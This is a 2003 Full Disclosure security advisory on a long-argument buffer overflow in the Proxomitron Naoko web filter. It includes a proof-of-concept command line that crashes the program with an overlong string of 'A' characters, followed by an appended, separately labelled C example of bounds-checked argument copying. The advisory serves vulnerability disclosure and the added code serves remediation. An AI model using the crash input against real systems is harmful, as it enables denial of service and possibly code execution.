Full Disclosure mailing list archives
[SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS
From: Grégory Le Bras | Security Corporation <gregory.lebras () security-corp org>
Date: Wed, 19 Feb 2003 21:21:43 +0100
.: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
________________________________________________________________________

Security Corporation Security Advisory [SCSA-005]
________________________________________________________________________

PROGRAM: The Proxomitron Naoko
HOMEPAGE: http://www.proxomitron.org/
VULNERABLE VERSIONS: 4.4 and prior
________________________________________________________________________

DESCRIPTION
________________________________________________________________________

The Proxomitron is an Universal Web Filter.
(direct quote from Proxomitron website)

DETAILS & EXPLOITS
________________________________________________________________________

Sending a parameter with a buffer of 1024 bytes in length or more, causes
Proxomitron Naoko to crash. This vulnerability can be easily exploited to
execute code.

Exploitation example :

c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA

SOLUTIONS
________________________________________________________________________

No solution for the moment.

VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified

LINKS
________________________________________________________________________

French Version :
http://www.security-corp.org/advisories/SCSA-005-FR.txt

------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
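
Added example (not part of the advisory, and not Proxomitron's code): a bounds-checked way to take a path from the command line into a fixed buffer, rejecting an overlong argument instead of copying it. The 1024-byte buffer size is an assumption taken from the threshold the advisory reports; copy_path_arg and PATH_BUF are hypothetical names.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size, taken from the advisory's 1024-byte threshold. */
#define PATH_BUF 1024

/*
 * Copy a command-line path argument into a fixed-size buffer.
 * Returns 0 on success. Returns -1 with errno set when an argument is
 * missing or when the string plus its terminating NUL does not fit.
 * The pattern this replaces is an unbounded copy, e.g. strcpy(dst, arg),
 * which writes past dst as soon as arg reaches dst_size bytes.
 */
int copy_path_arg(const char *arg, char *dst, size_t dst_size)
{
    size_t len;

    if (arg == NULL || dst == NULL || dst_size == 0) {
        errno = EINVAL;
        return -1;
    }
    len = strlen(arg);
    if (len >= dst_size) {      /* no room left for the NUL terminator */
        dst[0] = '\0';          /* leave the buffer in a defined state */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, len + 1);  /* len + 1 copies the terminator too */
    return 0;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];

    if (argc < 2)
        return 0;
    if (copy_path_arg(argv[1], path, sizeof path) != 0) {
        fprintf(stderr, "argument rejected: limit is %zu bytes\n",
                sizeof path - 1);
        return 1;
    }
    printf("loading %s\n", path);
    return 0;
}
```

Rejecting the argument, rather than silently truncating it, avoids opening a different file than the one the caller named.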